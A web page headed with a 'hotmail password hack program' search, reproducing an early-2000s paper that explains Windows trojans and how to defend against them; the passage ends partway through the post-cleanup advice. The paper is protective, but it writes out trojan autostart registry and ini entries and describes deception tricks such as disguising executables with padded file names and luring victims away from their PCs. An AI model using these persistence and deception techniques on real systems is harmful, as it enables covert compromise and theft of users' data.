Search Results - hotmail password hack program

Topic: The Windows Trojans Paper: ion. Links to special detection software are included as well as many other topics never discussed before. This paper is not only intended to be for the average Internet/Windows user who wants to know how to protect his/her machine from Trojan Horses or just want to know about their usage, variations, prevention and future, but will also be interesting for the advanced user, to read another point of view. Windows Trojans are just a small aspect of Windows Security but you will soon realise how dangerous and destructive they could be while reading the paper. 2.What Is A Trojan Horse? ----------------------- A Trojan horse is: - An unauthorised program contained within a legitimate program. This unauthorised program performs functions unknown (and probably unwanted) by the user. - A legitimate program that has been altered by the placement of unauthorised code within it; this code performs functions unknown (and probably unwanted) by the user. - Any program that appears to perform a desirable and necessary function but that (because of unauthorised code within it that is unknown to the user) performs functions unknown (and definitely unwanted) by the user. The Trojan Horse got its name from the old mythical story about how the Greeks gave their enemy a huge wooden horse as a gift during the war. The enemy accepted this gift and they brought it into their kingdom, and during the night, Greek soldiers crept out of the horse and attacked the city, completely overcoming it. 3.How Do Trojans Work? -------------------- Trojans come in two parts, a Client part and a Server part. When the victim (unknowingly) runs the server on its machine, the attacker will then use the Client to connect to the Server and start using the trojan. TCP/IP protocol is the usual protocol type used for communications, but some functions of the trojans use the UDP protocol as well. When the Server is being run on the victim's computer, it will (usually) try to hide somewhere on the computer, start listening on some port(s) for incoming connections from the attacker, modify the registry and/or use some other autostarting method. It's necessary for the attacker to know the victim's IP address to connect to his/her machine. Many trojans have features like mailing the victim's IP, as well as messaging the attacker via ICQ or IRC. This is used when the victim has dynamic IP which means every time you connect to the Internet you get a different IP (most of the dial-up users have this). ADSL users have static IPs so the infected IP is always known to the attacker and this makes it considerably easier to connect to your machine. Most of the trojans use Auto-Starting methods so even when you shut down your computer they're able to restart and again give the attacker access to your machine. New auto-starting methods and other tricks are discovered all the time. The variety starts from "joining" the trojan into some executable file you use very often like explorer.exe, for example, and goes to the known methods like modifying the system files or the Windows Registry. System files are located in the Windows directory and here are short explanations of their abuse by the attackers: - Autostart Folder The Autostart folder is located in C:\Windows\Start Menu\Programs\startup and as its name suggests, automatically starts everything placed there. - Win.ini Windows system file using load=Trojan.exe and run=Trojan.exe to execute the Trojan - System.ini Using Shell=Explorer.exe trojan.exe results in execution of every file after Explorer.exe - Wininit.ini Setup-Programs use it mostly; once run, it's being auto-deleted, which is very handy for trojans to restart - Winstart.bat Acting as a normal bat file trojan is added as @trojan.exe to hide its execution from the user - Autoexec.bat It's a DOS auto-starting file and it's used as auto-starting method like this -> c:\Trojan.exe - Config.sys Could also be used as an auto-starting method for trojans - Explorer Startup Is an auto-starting method for Windows95, 98, ME and if c:\explorer.exe exists, it will be started instead of the usual c:\Windows\Explorer.exe, which is the common path to the file. Registry is often used in various auto-starting methods. Here are some known ways: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "Info"="c:\directory\Trojan.exe" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce] "Info"="c:\directory\Trojan.exe" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] "Info"="c:\directory\Trojan.exe" [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce] "Info="c:\directory\Trojan.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "Info"="c:\directory\Trojan.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce] "Info"="c:\directory\Trojan.exe" - Registry Shell Open [HKEY_CLASSES_ROOT\exefile\shell\open\command] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command] A key with the value "%1 %*" should be placed there and if there is some executable file placed there, it will be executed each time you open a binary file. It's used like this: trojan.exe "%1 %*"; this would restart the trojan. - ICQ Net Detect Method [HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\] This key includes all the files that will be executed if ICQ detects Internet connection. As you can understand,this feature of ICQ is very handy but it's frequently abused by attackers as well. - ActiveX Component [HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName] StubPath=C:\directory\Trojan.exe These are the most common Auto-Starting methods using Windows system files, and the Windows registry. 4.Trojans Variations ------------------ There are so many variations out there, it will be hard to list and describe each and every one of them, but most are a combination of all the trojan features you will read about below, or have many other functions still not, and probably will never be known to the public. Remote Access Trojans These are probably the most publicly used trojans,just because they give the attackers the power to do more things on the victim's machine than the victim itself, while standing in front of the machine. Most of these trojans are often a combination of the other variations you'll read below. The idea of these trojans is to give the attacker a COMPLETE access to someone's machine, and therefore access to files, private conversations, accounting data, etc. Password Sending Trojans The purpose of these trojans is to rip all the cached passwords and also look for other passwords you're entering then send them to a specific mail address, without the user noticing anything. Passwords for ICQ, IRC, FTP, HTTP or any other application that require a user to enter a login+password are being sent back to the attacker's e-mail address, which in most cases is located at some free web based e-mail provider. Most of them do not restart when Windows is loaded, as the idea is to gather as much info about the victim's machine as passwords, mIRC logs, ICQ conversations and mail them; but it depends on the needs of the attacker and the specific situation. Keyloggers These trojans are very simple.The only one thing they do is to log the keystrokes of the victim and then let the attacker search for passwords or other sensitive data in the log file. Most of them come with two functions like online and offline recording. Of course they could be configured to send the log file to a specific e-mail address on a daily basis. Destructive The only function of these trojans is to destroy and delete files. This makes them very simple and easy to use. They can automatically delete all your core system files (for example: .dll, .ini or .exe files, possibly others) on your machine. The trojan is being activated by the attacker or sometimes works like a logic bomb and starts on a specific day and at specific hour. Denial Of Service (DoS) Attack Trojans These trojans are getting very popular these days, giving the attacker power to start DDoS if having enough victims of course. The main idea is that if you have 200 ADSL users infected and start attacking the victim simultaneously, this will generate a LOT of traffic (more then the victim's bandwidth, in most cases) and its the access to the Internet will be shut down. WinTrinoo is a DDoS tool that has become really popular recently, and if the attacker has infected many ADSL users, major Internet sites could be shut down as a result, as we've seen it happen in the past few months. Another variation of a DoS trojan is the mail-bomb trojan, whose main aim is to infect as many machines as possible and simultaneously attack specific e-mail address/addresses with random subjects and contents which cannot be filtered. Proxy/Wingate Trojans Interesting feature implemented in many trojans is turning the victim's computer into a proxy/wingate server available to the whole world or to the attacker only. It's used for anonymous Telnet, ICQ, IRC, etc., and also to register domains with stolen credit cards and for many other illegal activities. This gives the attacker complete anonymity and the chance to do everything from YOUR computer and if he/she gets caught the trace leads back to you. FTP Trojans These trojans are probably the most simple ones and are kind of outdated as the only thing they do is to open port 21(the port for FTP transfers) and let EVERYONE connect to your machine or just the attacker. Newer versions are password protected so only the one that infected you may connect to your computer. Software Detection Killers There are such functionalities built into some trojans, but there are also separate programs that will kill ZoneAlarm, Norton Anti-Virus and many other (popular anti-virus/firewall) programs, that protect your machine. When they are disabled, the attacker will have full access to your machine, to perform some illegal activity, use your computer to attack others and often disappear. Even though you may notice that these programs are not working or functioning properly, it will take you some time to remove the trojan, install the new software, configure it and get back online with some sense of security. I would like you to look at a list created by SnakeByte (nice work dude!): http://www.snake-basket.de/e/AV.txt Check it out and you will get my point how easily these programs could be disabled. It's a list of Anti-Virus detection software with its Window Names, associated files and many more things that attackers found as a way to disable certain protection software. I've seen only several anti-trojan packages that let the user specify another location of the program (installation) files, different from the default one, also Window names and many other features that will make it harder for the attacker to disable the software. 5.The Future Of Windows Trojans ----------------------------- Windows users will always be targets of malicious attackers because most of them don't know the real meaning of the word security, and think that some firewall is the only solution they need for protection but they actually don't have a clue how it works, or how to configure it properly. Windows Trojans will be a big security problem in the future and I'm sure attackers realise that, and many more unique functions will be implemented into their trojans but will mostly be used for the attacker's private purposes. Programmable or scriptable "automated hacking" functions will be used to solve various attacker's problems starting from anonymous port scanning and going up to Distributed Denial Of Service Attacks(DDoS). A recommended resource related to the subject is http://staff.washington.edu/dittrich/misc/ddos/ How about distributed cracking of password files like on all of these contests around the world but in that case a network created by attacker/attackers for their own purposes? Has anyone ever thought of "spamming" function, built into trojans, similar to all of these spam programs out there, crawling around the Internet, searching for e-mails? And these are just small examples, but trust me, there are much more advanced features, built into Windows Trojans, that probably will never be released to the public. At this year's Defcon the security company SensePost made a demonstration with a trojan, called Setiri, bypassing all the firewalls and IDS's giving access to the attacker even the machine was in a restricted environment. More info is available at: http://www.computercops.biz/modules.php?name=News&file=article&sid=1321 6.How Can I Get Infected? ----------------------- A lot of people out there can't differ various ways of infection just because in their minds the only way of getting infected is by downloading and running server.exe and they will never do it as they say. As you'll read here, there are many more ways for malicious attackers to infect your machine and start using it for illegal activities. Please take all of these topics I'm reviewing here really seriously; read them carefully and remember that prevention is way better than the cure! 6.1 ICQ 6.2 IRC 6.3 Attachments 6.4 Physical Access 6.5 Browser And E-mail Software Bugs 6.6 Netbios(FileSharing) 6.1 Via ICQ People don't understand that they can also get infected while talking via ICQ or any other Instant Messenger Application. It's all risky when it's about receiving files no matter from who, and no matter from where. Believe it or not, there are still guys out there, using really old versions of ICQ and it's all because they can see the IP of the person they're talking to. The older versions of ICQ had such functionality and it was useful for everyone capable of using winnuke and other DoS tools, but really how hard it is to click with the mouse? These people are often potential victims of someone that is more knowledgeable on Windows trojans and takes advantage of their old ICQ versions. Let's review various ways of getting infected via ICQ: - You can never be 100% sure who's on the other side of the computer at the particular moment. It could be someone that hacked your friend's ICQ UIN (Unique Identification Number)and wants to spread some trojans over his/her friends. You'll definitely trust your best dude Bob if he offers you something interesting, but is it really Bob on the other side? - Old versions of ICQ had bugs in the WebServer feature, that creates a site on your computer, with your info from the ICQ database. The bug consists in that the attacker can have access to EVERY file on your machine and if you read the previous sections carefully and know the auto-start methods, you'll probably realise what could happen if someone has access to your win.ini or other system file, namely a trojan installed in a few minutes. - Trojan.exe is renamed like Trojan....(150 spaces).txt.exe, icon changed to a real .txt file and this will definitely get you infected. This bug must be fixed in the newer versions for sure. No matter which Instant Messenger Application you're using, you could always get yourself infected by certain program bug you never had the chance to hear about, and never took care of checking for newer versions of the application, also when it's about receiving files no matter where, and no matter from who, take that very seriously and realise the dangers of your naivety. 6.2 Via IRC So many people LIVE on IRC and this is another place where you can get yourself infected. Trust is vital no matter what you're doing. No matter who is sending you files, pretending to be free porn archive, software for "free internet", hacking Hotmail program, DO NOT get any of these files. Newbies are often targets of these fakes, and believe me, many people are still newbies about their security. Users get infected from porn-trade channels, and, of course, warez channels, as they don't think about the risk, but how to get free porn and free programs instead. Here are several scenarios of you getting infected while using IRC: - You're talking with someone, a "girl" probably, have great time and, of course, you want to see the person you're talking to. You ask for a picture or the "girl" offers you her pictures and I'm sure you'll definitely want to see them. The "girl" says that she has just created her first screensaver, using some known free or commercial software to do this, and offers it to you, but how about if "she" mentions several pictures are naked ones?! You have been talking to "her" for a week or so, you get this screensaver.exe, you run it and, yeah, VERY nice pics, some are naked and she didn't lie to you so nothing bad or suspicious has happened BUT think again what really has happened! - Trojan.exe could also be renamed into Trojan.scr like a screensaver extension and will again run properly when you execute it so pay attention about these file extensions. - Trojan.exe is being renamed like Trojan....(150 spaces).txt.exe you'll get the file over IRC in the DCC it will appear as .TXT and you won't get worried about anything, run it and get yourself infected again. In all of these examples the icon of the file is changed, of course, because it needs to be the same icon as a normal .TXT and this fools victims very often. Most people don't notice in their Explorer that the Type of the file is Application BUT with a .TXT icon. So BEFORE you run something, even if it's with a .TXT icon, check its extension and make sure it's really a text file. 6.3 Via Attachments I'm always amazed how many people got themselves infected by an attachment, sent into their mailboxes. Most of these users are new to the Internet and are pretty naive. When they receive a mail,containing an attachment, saying they will get free porn, free Internet access etc., they run it without completely understanding the risks for their machines. Check the following scenario: you know your friend Alex is a very skilled Visual Basic programmer. You also know he's coding his latest program but you're curious what it is all about, and you wait for an e-mail from him with the attachment when he finishes coding the application. Yeah, but the person targeting YOU also knows that. The attacker also knows your friend's e-mail address. Then the attacker will simply code some program or get some freeware one, use some relaying mail server to fake the e-mail's FROM field and make it look like your friend's one; Alex's e-mail address is alex@example.com so the attacker's FROM field will be changed to alex@example.com and, of course, it will include the TROJANED attachment... You'll check your mail, see that Alex finally got his program ready and sent it, you'll download and run it without thinking that it might be a trojan or something else, because, hey, Alex wouldn't do something like that to me, he's my friend, and you'll get yourself infected. Information Is Power! Just because the attacker knew you were waiting for some particular file, he found Alex's e-mail address and got you infected... the right moment assumes importance here. And it all happened just because you were naive, just because you saw alex@example.com in the FROM field, and just because you didn't check the mail headers to see that the mail came from some .jp mail server relaying e-mails and, has been used from spammers for several months. Many people got themselves infected by the famous "Microsoft Internet Explorer Update" sent directly to their mailboxes, by the nonexistent Microsoft Updates Staff. I understand you felt great because Microsoft are paying attention especially to you, and sent you the latest updates, but these "updates" are definitely trojans. Microsoft will NEVER send you updates of their software via e-mail no matter you see the FROM field is updates@microsoft.com and as you've noticed in the previous example the FROM field could and IS faked. If you ever notice some mail in your mailbox with subjects like "Microsoft IE Update" and such, delete WITHOUT viewing or reading the e-mail, because some E-Mail clients like Outlook Express and others, have bugs that automatically execute the file being attached in the e-mail WITHOUT you even touching it. As you can imagine this is a extremely dangerous problem that requires you to be always up to date with the latest version of any software you're using. 6.4 Physical Access Physical access is vital for your computer's security. Imagine what can an attacker do while having physical access on your machine, and let's not mention if you're always connected to the Internet and leave the room for several minutes... long enough to get you infected. Here I'll point you several scenarios, often used by attackers to infect your computer while they're having physical access to your machine. There are some very smart people out there that keep thinking of new ways of getting physical access to someone's computer. Here are some tricks that are interesting: - Your "friend" wants to infect you with a trojan and he/she has physical access to your machine. Let's say you were at home surfing the net, chatting or whatever. Suddenly your "friend" asks you for a glass of water, knowing that you'll go in another room and will be away for 1 or 2 minutes. While you do that he/she takes out a diskette of the pocket and infects your unprotected PC. You came back and everything is OK because your "friend" is doing exactly the same thing before you left...surfing the net. - The next example is when 2 guys want to take revenge on you cause of something and are supporting each other to accomplish the task. Again you are at home with your "friend", surfing, chatting, whatever you're doing; suddenly the telephone rings and a "friend" of yours wants to speak with you for something that is really important. He/she (it's better to be she in this case) asks "Is there anyone around you? If so,please move somewhere away from him/her(after knowing it is him or her,of course). I don't want anyone to listen what I'm going to tell you". The victim is again lured away from the computer, leaving the attacker to do whatever he/she wants on the target computer. - Other approaches like the previous ones might be sudden ring on the bell, as well as other variations of phone calls and conversations leaving the attacker alone with the victim's computer. There are so many other possible approaches; just think for a while and you'll see what I mean and how easily you could be tricked, and it's because you're not suspicious enough when it is about your sensitive computer data. - Another way of infecting while having physical access is the Auto-Starting CD function. You've probably noticed that when you place a CD in your CDROM, it automatically starts with some setup interface; here's an example of the Autorun.inf file that is placed on such CD's: [autorun] open=setup.exe icon=setup.exe So you can imagine that while running the real setup program a trojan could be run VERY easily, and as most of you probably don't know about this CD function they will get infected and won't understand what happened and how it's been done. Yeah, I know it's convenient to have the setup.exe autostart but security is what really matters here, that's why you should turn off the Auto-Start functionality by doing the following: Start Button->Settings->Control Panel->System-> Device Manager->CDROM->Properties->Settings and there you'll see a reference to Auto Insert Notification. Turn it off and you won't have any problems with that function anymore. I know MANY other variations of physical access infections but these are the most common ones so pay attention and try to make up several more by yourself. When the victim IS connected to the Internet: Here we have many variations; again, I'll mention the most common ones. While the attacker is having physical access he/she may download the trojan.exe, using various ways just by knowing how various Internet protocols work. - A special IRCbot known only to the attacker is staying in IRC with the only function to DCC the trojan.exe back to the attacker whenever he/she messages the bot with a special command. The victim will probably be away from the computer. - The attacker wants to download some specific software like new version of some programs infected with trojan(s), of course, and visit some URL, known to him/her only, and download the trojan. - The attacker pretends he/she wants to check his/her (web based) mail (for example, at Yahoo! or HotMail) but in fact has the trojan.exe stored in his/her mailbox and just downloads and executes the file, hereby infecting the computer. The mail service is used as a storage area, in this case. There are many more ways of infecting the victim while connected to the Net, as you can imagine. Any of these examples will succeed but it all depends on the victim's knowledge of the Internet and how advanced his/her skills are, so the attacker needs to check these things somehow before doing any of these activities I pointed here. After that, the attacker will be able to choose the best variant for infecting the victim and doing the job. 6.5 Browser And E-mail Software Bugs Users do not update their software versions as often as they should be, and a lot of the attackers are taking advantage of this well known fact. Imagine you are using an old version of Internet Explorer and you visit a (malicious) site that will check and automatically infect your machine without you downloading or executing any programs. The same scenario goes when you check your E-mail with Outlook Express or some other software with well known problems, again you will be infected without downloading the attachment. Make sure you always have the latest version of your Browser and E-mail Software, and reduce the ways of these variations to minimum. Here are some links about Browser and E-mail Software bugs, check them out and understand how dangerous these bugs are, and it's all because of you using an old version of the software. http://www.guninski.com/browsers.html http://www.guninski.com/netscape.html 6.6 Netbios(File Sharing) If port 139 on your machine is opened,you're probably sharing files and this is another way for someone to access your machine, install trojan.exe and modify some system file, so it will run the next time you restart your PC. Sometimes the attacker may use DoS(Denial Of Service Attack) to shut down your machine and force you to reboot, so the trojan can restart itself immediately. To block file sharing in WinME version, go to: Start->Settings->Control Panel->Network->File And Print Sharing and uncheck the boxes there. That way you won't have any problems related to Netbios abuse. 7.Fake Programs ------------- Imagine a Freeware SimpleMail program that's very suitable for your needs, and very handy with its features like address book, option to check several POP3 accounts and many other functions that make it even better then your E-mail client and the best thing for you is that it's free. You use ZoneAlarm or any other similar protection software, and mark the program as a TRUSTED Internet server so none of your programs will ever bother you about that program as you are using it probably every day because it's working very well, no problems ever occurred, you're happy, but a lot of things are going in the background. Every mail you send and all your passwords for the POP3 accounts are being mailed directly into the attacker's mailbox without you noticing anything. Cached passwords and your keystrokes could be also mailed and the idea here is to gather as much info as possible and send it to the attacker. This info includes credit card numbers, passwords for various applications and many other things. In some cases the attacker may have complete access to your machine but it depends on his/her ideas about the hidden program's functions. When sending e-mails and using port 25 or 110 for POP3, these could be used for connections from the attacker's machine (not at home, of course, but again from another hacked one) to connect and use the hidden functions he/she implemented in the Freeware SimpleMail. The attacker's idea here is to offer you a program that requires a connection to be established with some server; let's say at the top of the SimpleMail there's a banner that's auto-refreshing every few minutes, because the programmer "needs to pay the bills too" as he said in the About section, so nothing seems suspicious to you as it's a normal thing, and your logical conclusion is completely right as the only way for that guy to keep offering this cool freeware program for free is to use banners. You've already marked the program as TRUSTED so the attacker can have complete access to your machine because he/she fooled you into thinking it's a TRUSTED program. Even if you notice some connection to your machine on some strange port, you won't consider this as a suspicions event, as the banners section needs to get these banners from somewhere, and this is the place your machine is connected all the time to keep them refreshing. The only thing the attacker needs is creativity, and most of them do have it.Think of a fake AudioGalaxy (software for mp3's sharing) but, of course, with a different name. The attacker would create it, will free 15GB disk space on his machine and place a large archive of mp3's...then, of course, the same will be done on several other machines to fool you that you are downloading from other people located all over the world, but it's not necessary as the program's interface may never show you where you're actually downloading the mp3's from. The software will again be backdoored as in the previous example, and will get thousands of naive users, probably using ADSL connections, infected. Fake programs that have hidden functions, often have professional looking web sites, links to various anti-trojan software mentioned as affiliates, and make you trust the site; readme.txt is included in the setup and many other things to fool you it's a trusted one. Pay attention to freeware tools you download, consider them extremely dangerous and a very useful and easy way for attackers to infect your machine with a Trojan. 8.Untrusted Sites And Freeware Software ------------------------------------- A site located at some free web space provider or just offering some programs for illegal activities can be considered as untrusted one. As you know, there are thousands of "hacking/security" archives on these free web space providers like Xoom, Tripod, Geocities and many many others. These sites have archives full with "hacking" programs, scanners, mail-bombers, flooders and many other tools. Often several, if not all of these programs are infected by the guy who created the site. It's highly risky to download any of the programs and the tools located on such untrusted sites; no matter which software you use are, you ready to take the risk? There are some untrusted sites, looking REALLY professional and having huge archives, full with Internet related software, feedback form, links to other popular sites. I think if you take some time, look deeper, scan all the files you download you can decide on your own whether the site you are downloading your software from is a trusted or an untrusted one. Software like mIRC, ICQ, PGP or any other popular software MUST be downloaded from its original (or official dedicated mirror site) and not from any of these I told you about. Sometimes such sites claim there's a new version of, let's say, mIRC 7.0, and you know your current version is 6.0 and, yeah, it's handy to click on the URL and download the .exe in 1 minute and take advantage of the latest version, but will definitely get yourself infected. A possible variation of this method will again be claiming for a new version, BUT the site would include info on nonexistent security bugs, found in the previous one (which is of course the latest you have), and again it is handy for you to download it, instead of visiting mIRC's main site, and see if there is really an updated version or check for any of these security bugs you've read about on the fake site. Webmasters of well known Security Portals, that have HUGE archive with various "hacking" programs, should be responsible for the files they pr ovide and OFTEN scan them with Anti-Virus and Anti-Trojan software to guarantee their visitors download "free of trojans and viruses". A known method is that attackers send some program created by them, let's say a UDP flooder, to the webmaster like a submission for the archive, but infect the program with some trojan and later have visitors downloading the program and getting themselves infected. Some attackers may use the webmaster's irresponsibility and infect their files, and have the site distribute the trojan. I know of another story regarding this problem. It's about a Gaming Magazine that used to include a CD with free demo versions of the latest games in each new edition. The editors made a contest to find new talents and give the people programming games the chance to popularise their productions by sending them to the Editors. An attacker infected his game with a new and private trojan and sent it to the Magazine. In the next edition the "game" appeared on the CD and you can imagine the chaos that set in. And it's all because of the Editors, having not so much knowledge on the topic and as I've told you, in the old days Anti-Virus software were detecting only a small part of the public trojans (and what about all the private ones). In this particular case they were using only an Anti Virus scanner to protect their readers from such attacks. Webmasters and everyone having some sort of software archive on his/her portal, MUST scan it very often, and before adding a new file it should be well examined; if it's suspicious in any way, it must be sent to your software detection labs for further analysis. Do care about your visitors/readers if you want them to care about you. Freeware programs could be considered suspicious and extremely dangerous, due to the fact that it's a very easy and useful way for the attacker to infect your machine with some freeware program. No matter how suitable you find the program, remember that "free is not always the best" and it's very risky to use any of these programs. My advice is: before using Freeware program, do search for some reviews on it, check popular search engines, and try to look up for some info about it. If you find any reviews written by respected sites, that means they've used and tested it and the chance of infection is hereby, minimised. If no reviews or comments about the software are found via the search engines, then it may be highly risky to start using it. 9.How Are They Detecting My Internet Presence? -------------------------------------------- People new to the Internet often ask this question as they can't understand why someone will want to attack especially them, because they never did any harm to anyone and never did something that might get them into trouble. While reading the previous sections, I hope you understood that sometimes you only need to visit a web site with your unpatched browser and get yourself infected. I will explain several scenarios on how attackers may discover your Internet presence: - When visiting a web page,the attacker might have created a script that will automatically check your Browser for known bugs, and if any are detected, install a trojan on your machine or notify the attacker to have a deeper look. Make sure you're always using the latest version of your Browser for maximal protection. Check for (security) patches and apply these often! - When joining an IRC channel, an IRC bot might be configured to scan everyone joining for specific trojan ports opened or FileSharing (Netbios) enabled. If the attacker is smart, the script will scan you several minutes after you join the channel and, of course, use an IP number not belonging to anyone in the channel. - Attackers often attempt IP blocks scanning, looking default trojan ports and of course FileSharing(Netbios). After infection, your machine could also be used for such scans, as well as an IRC bot, scanning those joining some big and full with people IRC channel. These are some of the most common ways attackers use to search for new victims, suitable for their illegal activities. If someone is targeting especially you, the attacker won't be using any of these methods I reviewed above; instead your Browser version will be found as well as the Operation System you're using, and the attacker will make a personal contact with you via IRC, ICQ, etc., and fool you somehow and get you infected. 10.What Is The Attacker Looking For? --------------------------------- Some of you may think that trojans are used for damages only. Well, they can also be used for spying on someone's machine and taking a lot of private and sensitive information (industrial espionage). The attacker's interests would include but are not limited to the following: - Credit Card Information (often used for domain registration, shopping with your credit card) - Any accounting data (E-mail passwords, Dial-Up passwords, WebServices passwords, etc.) - Email Addresses (Might be used for spamming, as explained above) - Work Projects (Steal your presentations and work related papers) - Children's names/pictures, Ages (pedophile attacker?!) - School work (steal your papers and publish them with his/her name on it) I'll mention again several scenarios about the attacker's mode of thinking: - Once infected, your computer might be used as a Warez Archive. No matter how much or little free disk space you have, you'll probably have enough for the attacker's needs. He/she won't use all of your bandwidth; there will be some limit for connections to your computer, so you'll still be able to do your work without knowing that your computer is used as a pirated software FTP Server and it is known to people worldwide who keep downloading software from YOU. - Kiddie-Porn traders will also use your computer for storing their archives and again turning your machine into a well known place for traders of nasty and above all illegal pictures. You'll again do your work and have no clue there are illegal activities going in your computer. - The attacker might just want to have fun with you, open/close the CD tray, play with your mouse, annoy you somehow; that's stupid and useless but a lot of people do it. - Your computer might be used for other illegal purposes like the attacker's usage of your IP address to hack, scan, flood, infiltrate other machines on the Internet; so the victims will see your machine is doing it, and this will definitely get you in trouble. 11.Intelligence With Trojans ------------------------- Think for a while about how much your life depends on your computer, your ICQ, your chat program, your e-mail address and think how vulnerable your life is just because you're infected with a Trojan Horse. They can, and they have been used for intelligence for a very long time. Just by reading your e-mails, keeping track of your contacts, reading your private conversations, the web sites you visit, ICQ history, mIRC log files with your private conversations and a log of everything you do online, a psychological profile could be created in several hours (depends of the skills of course) and your life, mode of thinking, reactions on specific future situations and needs will be revealed to some geek, wanting to recruit and/or manipulate you. This is food for thought and another topic, but just think how a combination of psychology, social engineering and computer security knowledge makes you a really powerful guy. And remember that people reveal their REAL personalities, wishes, mode of thinking, interests only when they think nobody is watching them... 12.Trojan Ports ------------ Trojans use specific ports to communicate with the client. In the old days the well known trojan ports were mostly used, but today it's possible to change the port every time the trojan is restarted. Here is a link to the best and probably including all of the public trojans Ports List I've come across. http://www.simovits.com/trojans/trojans.html 13.How Do I Know I'm Infected? --------------------------- Sometimes you think it's normal Windows behaviour when there are 500 MB or so missing on your HDD, because some software is using it, or you have installed a game you forgot about and many other reasons but not the real one. Here are some things which are very suspicious, and no matter how much your Anti-Virus software tells you that you aren't infected, dig a little deeper and see what really happened. One thing that will help you is to know the main features of the public trojans, so you'll be able to react if you notice such activity on your PC. I have included links to various Trojan Databases that you should visit if you want to know the main features of the public ones. - Its normal to visit a web site and several more pop-ups to appear with the one you've visited. But when you do completely nothing and suddenly your browser directs you to some page unknown to you, take that serious. - A strange and unknown Windows Message Box appears on your screen, asking you some personal questions. - Your Windows settings change by themselves like a new screensaver text, date/time, sound volume changes by itself, your mouse moves by itself, CD-ROM drawer opens and closes. Please note that most advanced attackers will just spy on you and use your infected machine for some specific reason, and not perform any of the above "tricks" so as not to cause any suspicious activity on the target system (as this would probably mean they could get easily detected). Someone that just wants to have fun with you is more likely to perform these actions. 14.Anti-Virus (AV) Scanners ------------------- In the old days Virus Scanners used to detect only viruses and just a small part of the public trojans on the Internet. Realising how dangerous and popular Trojans are becoming today most, if not all of these scanners detect probably all of the public ones out there. As always people, think they are safe and secure when using Virus Scanner but it's a false sense of security. This type of software relies mainly on "signatures" of each trojan's server executable and also its common auto-starting methods, but that is not the perfect solution by far for protection yourself against trojans, as they use many other methods to hide inside the machine, most of which are undetected by Anti-Virus Software. When trojans became a big security breach, specific Anti-Trojan packages were released to the public and it was necessary for the AVs to start detecting not only viruses, but also trojans if they wanted new users. As a result, most of them became really advanced trojan scanning and detection systems, but for your maximal protection it's recommended to use both Anti-Virus and Anti-Trojans software. Public trojans appear online almost every day and the detection software is updated every day for maximal protection of its customers. One very big problem is that the users do not update their signature files as often as they should be, thus having detection software that's not detecting several more trojans or viruses. Users MUST update their software's signature files every day, and it will take them only several minutes. Each and every time a new file is downloaded, it MUST be scanned BEFORE being opened with Anti-Virus and Anti-Trojan software. If you think the file is suspicious due to some reasons, do NOT run it, but send it to your detection software labs for analysis. 15.Anti-Trojan Software -------------------- Here are reviews of the most popular Anti-Trojan packages. The list also includes various applications (freeware) to help you monitor your computer for ongoing Trojan activities. I suggest you visit the site of every product and decide which one best fits to your needs. Check the links section at the end of the paper to see various sites, providing reviews of the software below. -- TDS-3 -- Trojan Defence Suite (TDS) is a indispensable, must-have software package for protection against trojans. It has many unique functions never seen in other Anti-Trojan packages. The program has really advanced features and if you're a newbie, it will probably take some time before you are able to use the software at its full capacity (read the excellent help files). You can get TDS from http://tds.diamondcs.com.au/ -- LockDown2000 -- This is really good Anti-Trojan package that detects a LOT of trojans and other known as "hacking tools" programs. It will help you monitor your system files for changes, processes and registry modification. More info at its home page. You can get LockDown2000 from http://www.lockdown2000.com -- TFAK5 -- Trojans First Aid Kit is a trojan-scanner developed by SnakeByte. It has many other unique features; it could be used as a Client for various public trojans as well. Download TFAK5 from http://www.snake-basket.de/tfak/TFAK5.zip -- Trojan Remover -- Anti-Trojan software detecting 5468 trojans/worms (including variants) as at 15th August 2002. Systems files and registry monitoring functions are also implemented. More info at its home page: http://www.simplysup.com/tremover/details.html -- Pest Patrol -- A tool that scans for trojans as well as programs known as "hacking tools" and spyware. More info at its official page: http://www.safersite.com/ -- Anti-Trojan 5.5 -- Trojans detection package that is able to remove most of the public trojans out there. More info at its official page: http://www.anti-trojan.net -- Tauscan -- Trojan scanner that has unique features and is a must have. It's also able to detect new and never released to the public trojans. More info at its official page: http://www.agnitum.com/products/tauscan/ -- The Cleaner -- Very popular Anti-Trojan software, known by everyone. Check its home page at: http://www.moosoft.com/ -- PC Door Guard -- Trojan detection software, detecting a lot of trojans, and a monitor of files and directories is also included. More info at: http://www.trojanclinic.com/pdg.html -- Trojan Hunter -- Trojan detection package with a lot of functions. It's very handy. More info at http://www.mischel.dhs.org/trojanhunter.jsp -- LogMonitor -- Log Monitor is a file and directory monitoring tool. The program periodically checks a selected file's modification time and executes an external program if file's time was changed or not changed. For directories it handles such events as files change, addition or removal. I recommend this tool as it's vary handy and will help you a lot. Home page: http://logmon.bitrix.ru/logmon/eng/ -- PrcView -- PrcView is a freeware process viewer utility that shows detailed information about running processes. This information includes such details as the create date/time, the version and full path for each DLL used by a selected process, a list of all threads, memory blocks and heaps. PrcView also allows you to kill and attach a debugger to a selected process. PrcView runs on both Windows 95/98 and Windows NT platforms and includes Windows and command-line versions of the program. Get PrcView from http://www.xmlsp.com/pview/prcview.htm -- XNetStat -- GUI based netstat tool for Windows. It will help you monitor you machine for open ports. Download it from: http://packetstormsecurity.org/Win/netstat.zip -- ConSeal PC FIREWALL -- A really good firewall for advanced users using Windows having basic knowledge of TCP/IP and other protocols; this software will help you to secure your PC a lot. It has some major advantages over other Win based firewalls. For the full range of specifications, check its official web page at: http://www.consealfirewall.com/ 16.After You Clean Yourself ------------------------ Your machine has been compromised and probably a lot of sensitive data stolen, files have been modified and illegal activities have been preformed on your computer. Here I'll give you recommendations about what to do after you are 100% clean of trojans. - Accounting Data such as ISP passwords, ICQ, mIRC, FTP, web site passwords, e-mail address passwords are definitely known to the attacker. Contact your ISP about changing your dial-up password if you're using such connection. Immediately change your ICQ, mIRC passwords of course if they're still the same. 